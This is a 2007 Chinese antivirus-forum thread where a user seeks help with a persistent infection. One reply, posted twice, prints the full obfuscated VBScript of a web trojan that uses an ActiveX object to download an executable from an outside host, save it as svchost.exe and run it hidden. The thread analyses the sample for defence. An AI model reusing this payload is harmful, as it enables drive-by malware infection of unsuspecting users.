12
返回列表 发新帖
楼主: sensai01
收起左侧

[已解决] 换了6次系统,重分了3次区无济于事啊!这次附上扫描结果。

[复制链接]
sensai01
 楼主| 发表于 2007-4-8 20:29:14 | 显示全部楼层

回复 #10 银砾石 的帖子

IP和DNS都是自动获取的呀~怎么屏蔽?
银砾石
发表于 2007-4-8 20:34:44 | 显示全部楼层
网上邻居-本地连接-TCP/IP协议里可以改DNS

HOST文件里吧那个地址设为127.0.0.1
zhaonimm
发表于 2007-4-8 22:08:42 | 显示全部楼层
原帖由 wangjay1980 于 2007-4-8 16:04 发表
<exflashservice><; "C:\Program Files\EPOX\EFS\EZ_FLASH_SERVICE.exe" "5000">  [N/A]
    <ManualRun><; "H:\AUTORUN\AutoRun">  [N/A]
删除了,然后装个防火墙
另外把桌面的IE快捷方式删除,重建一个

要是你的硬盘重新分区的话  不能在H盘出现这个啊AUTORUN\AutoRun
你的H盘不是光驱把........
sensai01
 楼主| 发表于 2007-4-8 23:53:25 | 显示全部楼层

回复 #13 zhaonimm 的帖子

我分了5个区   H盘是光驱。
sensai01
 楼主| 发表于 2007-4-8 23:55:50 | 显示全部楼层

回复 #12 银砾石 的帖子

有必要吗?IP和DNS都是自动获取,每次电脑重新启动地址都不一样的啊。
ooo-ppp
发表于 2007-4-9 07:03:01 | 显示全部楼层

转载

http://www.zhulinfeng.com/bbs

试了试,比较郁闷的是那个木马程序在我的电脑上运行不了~~汗~~一运行就出错~

http://w.qbbd.com/0.htm  

0.htm源码:
<SCRIPT language=VBScript>
on error resume next
****ie = "http://d.qbbd.com/0.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-

65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"  
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, ****ie, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)  
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</SCRIPT>




svchost.vbs源码:
Set Shell = CreateObject("Sh"&"ell"&".App"&"lic"&"at"&"ion")
Shell.ShellExecute"C:\DOCUME~1\MuseHero\LOCALS~1\Temp\svchost.exe","","","o"&"p"&"e"&"n",0



从上面的源码可以看出,这是一个标准的网页木马~(大家不要拿去害人啊~)

会下载svchost.exe并用VBScript来执行~

在我机器上执行后调用了两个系统程序后就出错退出了~没见有后继动作。

重启了两次,也没发现什么异常~那个网页文件与木马程序也能直接删除~

没发现什么特别的~

最近忙着升级5.0.1.0没时间反汇编这个木马~不过,应该是没什么特别的~

不知道那位朋友怎么会被搞的那么惨~让他用狙剑的文件监控试一试,看看弹出的IE是谁打开的,不就找到木马程序了么~~

汗~~格式化分区都不行~~还真是想不出有什么木马会这么牛~~应该是其它原因吧~
ooo-ppp
发表于 2007-4-9 07:04:28 | 显示全部楼层

转载

http://www.zhulinfeng.com/bbs

试了试,比较郁闷的是那个木马程序在我的电脑上运行不了~~汗~~一运行就出错~

http://w.qbbd.com/0.htm  

0.htm源码:
<SCRIPT language=VBScript>
on error resume next
****ie = "http://d.qbbd.com/0.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-

65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"  
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, ****ie, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)  
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</SCRIPT>




svchost.vbs源码:
Set Shell = CreateObject("Sh"&"ell"&".App"&"lic"&"at"&"ion")
Shell.ShellExecute"C:\DOCUME~1\MuseHero\LOCALS~1\Temp\svchost.exe","","","o"&"p"&"e"&"n",0



从上面的源码可以看出,这是一个标准的网页木马~(大家不要拿去害人啊~)

会下载svchost.exe并用VBScript来执行~

在我机器上执行后调用了两个系统程序后就出错退出了~没见有后继动作。

重启了两次,也没发现什么异常~那个网页文件与木马程序也能直接删除~

没发现什么特别的~

最近忙着升级5.0.1.0没时间反汇编这个木马~不过,应该是没什么特别的~

不知道那位朋友怎么会被搞的那么惨~让他用狙剑的文件监控试一试,看看弹出的IE是谁打开的,不就找到木马程序了么~~

汗~~格式化分区都不行~~还真是想不出有什么木马会这么牛~~应该是其它原因吧~
ballakay
发表于 2007-4-12 12:41:11 | 显示全部楼层
把硬盘全格!
eyeyoureyes
发表于 2007-4-12 14:13:01 | 显示全部楼层
你是不是用的拨号软件有问题?我觉得可能性很大。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 04:01 , Processed in 0.095730 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表